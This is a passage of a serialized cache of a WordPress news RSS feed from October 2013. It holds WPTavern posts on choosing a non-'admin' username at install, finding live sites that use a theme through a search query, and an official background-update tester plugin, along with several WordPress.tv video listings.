Installation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"http://feedproxy.google.com/~r/WordpressTavern/~3/fKUQvr6kSnY/change-the-admin-username-during-installation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3326:\"<p>One of the <a href=\"http://www.dailyblogtips.com/wordpress-security-tip-remove-the-admin-user/\" title=\"http://www.dailyblogtips.com/wordpress-security-tip-remove-the-admin-user/\">security tips</a> you&#8217;ll come across often is immediately deleting the admin user after installation and creating a new user, then assigning that user the administrator role. This is something I wish the core team would address so that during the installation of WordPress, users would be able to choose their own username and select a strong password without having to go back and delete the initial admin account. <span id=\"more-10500\"></span></p>\n<h3>Something New Learned At My WordPress Meetup</h3>\n<p>While attending my <a href=\"http://www.meetup.com/NEOWordPress/\" title=\"http://www.meetup.com/NEOWordPress/\">local WordPress meetup</a>, one of the new WordPress users in attendance mentioned the security tip of deleting the administrator account that is created during installation and creating a new user account that is then assigned the administrator role. The idea being that hackers try to login with admin as the username and then try multiple different passwords. I had mentioned that it would be great if WordPress enabled users to make this change during installation instead of having to do it after the fact. </p>\n<h3>Turns Out You Can</h3>\n<p>I discovered during a brand new WordPress 3.7 install that users were able to change the default username from admin, to something else. This is the first time I&#8217;ve installed WordPress in a long time which is why I didn&#8217;t know this change already took place. It also didn&#8217;t dawn on me because people are still sharing the security tip I mentioned above. This combination of the enhanced password strength meter and the ability to change the default admin user name during install saves new WordPress installation admins from having to go through a security step that has been preached about for years. As it turns out, users have been able to change the default username of admin for a number of versions. Based on research I conducted, this change has been in place since at least version 3.0. </p>\n<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/10/WordPress3.0.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/WordPress3.0.jpg?resize=500%2C219\" alt=\"WordPress 3 point 0\" class=\"aligncenter size-large wp-image-10502\" /></a></p>\n<h3>Why Are We Still Preaching This Security Tip?</h3>\n<p>With that being the case, why have so many fresh installs decided to use admin as the default username? Why do we continue to preach the security  tip of immediately deleting admin and replacing it with a different username? One of the suggestions at my local meetup was to not auto fill the username field with admin and instead, force new installers to create their own unique username. This sounds like a good suggestion to me. When we tried to do a fresh install of WordPress 3.6.1 to see what would happen, <strong>admin</strong> was automatically filled in for the username. It seems to me that making this simple change would make WordPress installs that much more secure right out of the gate. </p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/fKUQvr6kSnY\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 16:00:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: How To Find Live Examples Of Sites Using A WordPress Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10496\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"http://feedproxy.google.com/~r/WordpressTavern/~3/u8aPo48AZcE/how-to-find-live-examples-of-sites-using-a-theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2287:\"<p><a href=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/07/WPShoutLogo.png\" rel=\"thumbnail\"><img src=\"http://i1.wp.com/www.wptavern.com/wp-content/uploads/2013/07/WPShoutLogo.png?resize=300%2C51\" alt=\"WP Shout Logo\" class=\"alignright size-medium wp-image-7662\" /></a><a href=\"http://wpshout.com/how-to-find-live-examples-of-just-about-any-wordpress-theme/\" title=\"http://wpshout.com/how-to-find-live-examples-of-just-about-any-wordpress-theme/\">WPShout.com has a great article</a> that explains how to easily find websites that are using the theme you&#8217;re thinking about buying or using. One of the first things I try to do before downloading or purchasing a theme is to find actual websites that are using the design. While some theme companies have a showcase area highlighting these sites, most of them do not. Using the technique shared by WPShout, I was able to discover this neat looking child theme of <a href=\"http://twentythirteendemo.wordpress.com/\" title=\"http://twentythirteendemo.wordpress.com/\">TwentyThirteen</a>.<span id=\"more-10496\"></span></p>\n<p><a href=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/TwentyThirteenChildTheme.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/TwentyThirteenChildTheme.jpg?resize=500%2C262\" alt=\"Twenty Thirteen Child Theme\" class=\"aligncenter size-large wp-image-10497\" /></a></p>\n<p>According to WPShout, it&#8217;s as simple as a Google search. Simply type in <em>&#8220;wp-content/themes/[theme-name]&#8220;</em> ,quotation marks and all, and look for a search result that looks like a PHP scripting error. WPShout explains that Google sometimes indexes these errors which is why the name of the theme shows up in search results. I&#8217;ll let you read the article to figure out the secondary way of viewing live sites with themes you&#8217;re interested in but I thought this was an ingenious way of finding them. It will still take a little work on the user&#8217;s part to find the sites using the theme they are looking for, but this is a good stepping stone towards finding them. If nothing else, it enables you to see some PHP fatal error messages.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/u8aPo48AZcE\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 13:30:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Jeffro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"WPTavern: WordPress Core Developers Release Plugin To Test Automatic Background Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"http://www.wptavern.com/?p=10506\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"http://feedproxy.google.com/~r/WordpressTavern/~3/u8nGxe5ugU4/wordpress-releases-plugin-to-test-automatic-background-updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2616:\"<p>Over the weekend, WordPress developers Andrew Nacin and Dion Hulse released an official WordPress.org plugin that enables users to test their sites&#8217; compatibility with the background updates feature, introduced in <a href=\"http://www.wptavern.com/wordpress-3-7-released-wordpress-now-updates-itself\" title=\"WordPress 3.7 Released\" target=\"_blank\">WordPress 3.7</a>. </p>\n<p><a href=\"http://wordpress.org/plugins/background-update-tester/\">Background Update Tester</a> is an official plugin, released under the WordPress.org account. It was created to help users diagnose problems that prevent WordPress from updating automatically. Once installed, a new menu is available at the <em>Dashboard >> Update Tester</em> screen. The plugin performs a test and displays results on this screen. <span id=\"more-10506\"></span></p>\n<p>Here&#8217;s an example of the plugin in action on a site where background updates fail:</p>\n<p><a href=\"http://i2.wp.com/www.wptavern.com/wp-content/uploads/2013/10/fail.jpg\" rel=\"thumbnail\"><img src=\"http://i0.wp.com/www.wptavern.com/wp-content/uploads/2013/10/fail.jpg?resize=560%2C368\" alt=\"fail\" class=\"aligncenter size-full wp-image-10508\" /></a></p>\n<p>The plugin performs tests that will automatically answer the following questions for you:  </p>\n<ul>\n<li>Can your site communicate with WordPress.org securely?</li>\n<li>Are there any version control systems detected?</li>\n<li>Does your site require FTP credentials to perform updates?</li>\n<li>Are your files writable by WordPress?</li>\n</ul>\n<p>A non-technical user would have no idea how to answer these questions without the help of this plugin. As you can see in the example above, the tests found that WordPress was not able to edit files in the wp-admin folder and listed those files. This is something that&#8217;s easy enough to correct for a developer. If the user is less technically inclined, he can report the results of the test to his host to seek assistance for correcting the problem.</p>\n<p>If you&#8217;ve run into issues while trying to get background updates, this plugin is the key to finding your site&#8217;s incompatibility.</p>\n<p>Thankfully, most users won&#8217;t need this plugin, as a large majority of sites don&#8217;t have compatibility issues. If you&#8217;re eager to jump on the automatic updates train but have so far been prevented, install the <a href=\"http://wordpress.org/plugins/background-update-tester/\">Background Update Tester</a> plugin to find out how to correct the problem.</p>\n<img src=\"http://feeds.feedburner.com/~r/WordpressTavern/~4/u8nGxe5ugU4\" height=\"1\" width=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 12:01:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WordPress.tv: Christine Rondeau: Put Some Shine In Your Back-End\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24363\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wordpress.tv/2013/10/28/christine-rondeau-put-some-shine-in-your-back-end/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:683:\"<div id=\"v-iSeY4krC-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24363/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24363/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24363&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/28/christine-rondeau-put-some-shine-in-your-back-end/\"><img alt=\"Christine Rondeau: Put Some Shine In Your Back-End\" src=\"http://videos.videopress.com/iSeY4krC/video-7ce052cba4_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 08:56:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WordPress.tv: Suzette Franck: Resources For Reaching Your WordPress Potential\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24222\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wordpress.tv/2013/10/28/suzette-franck-resources-for-reaching-your-wordpress-potential/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:709:\"<div id=\"v-i3QnA151-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24222/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24222/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24222&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/28/suzette-franck-resources-for-reaching-your-wordpress-potential/\"><img alt=\"Suzette Franck: Resources For Reaching Your WordPress Potential\" src=\"http://videos.videopress.com/i3QnA151/video-346b07a995_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 28 Oct 2013 07:36:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WordPress.tv: Chip Bennett: Custom Layouts Without Using Page Templates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24325\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"http://wordpress.tv/2013/10/26/chip-bennett-custom-layouts-without-using-page-templates/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:691:\"<div id=\"v-NCvMW6P6-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24325/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24325/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24325&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/26/chip-bennett-custom-layouts-without-using-page-templates/\"><img alt=\"Chip Bennett: Custom Layouts Without Using Page Templates\" src=\"http://videos.videopress.com/NCvMW6P6/video-8245fc0da5_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 17:51:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WordPress.tv: Chris Wilcoxson: How to Build Your First Widget\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24323\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wordpress.tv/2013/10/26/chris-wilcoxson-how-to-build-your-first-widget/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:671:\"<div id=\"v-j8quHyVd-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24323/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24323/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24323&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/26/chris-wilcoxson-how-to-build-your-first-widget/\"><img alt=\"Chris Wilcoxson: How to Build Your First Widget\" src=\"http://videos.videopress.com/j8quHyVd/video-82bf8ff850_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 17:50:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WordPress.tv: Dougal Campbell: Secure All The Things!\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=18726\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://wordpress.tv/2013/10/26/dougal-campbell-secure-all-the-things/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:654:\"<div id=\"v-ivKKw66I-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/18726/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/18726/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=18726&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/26/dougal-campbell-secure-all-the-things/\"><img alt=\"Dougal Campbell: Secure All The Things!\" src=\"http://videos.videopress.com/ivKKw66I/video-701721a870_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 16:00:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WordPress.tv: Coen Jacobs and Scott Basgaard: WooCommerce 2.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wordpress.tv/?p=24109\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wordpress.tv/2013/10/25/coen-jacobs-and-scott-basgaard-woocommerce-2-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:677:\"<div id=\"v-ULdNP325-1\" class=\"video-player\">\n</div><br />  <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptv.wordpress.com/24109/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptv.wordpress.com/24109/\" /></a> <img alt=\"\" border=\"0\" src=\"http://stats.wordpress.com/b.gif?host=wordpress.tv&blog=5089392&post=24109&subd=wptv&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"http://wordpress.tv/2013/10/25/coen-jacobs-and-scott-basgaard-woocommerce-2-0/\"><img alt=\"Coen Jacobs and Scott Basgaard: WooCommerce 2.0\" src=\"http://videos.videopress.com/ULdNP325/video-0d3591da00_scruberthumbnail_0.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 26 Oct 2013 04:16:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WordPress.tv\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WPWeekly Episode 125 – Alex Denning And The Future Of 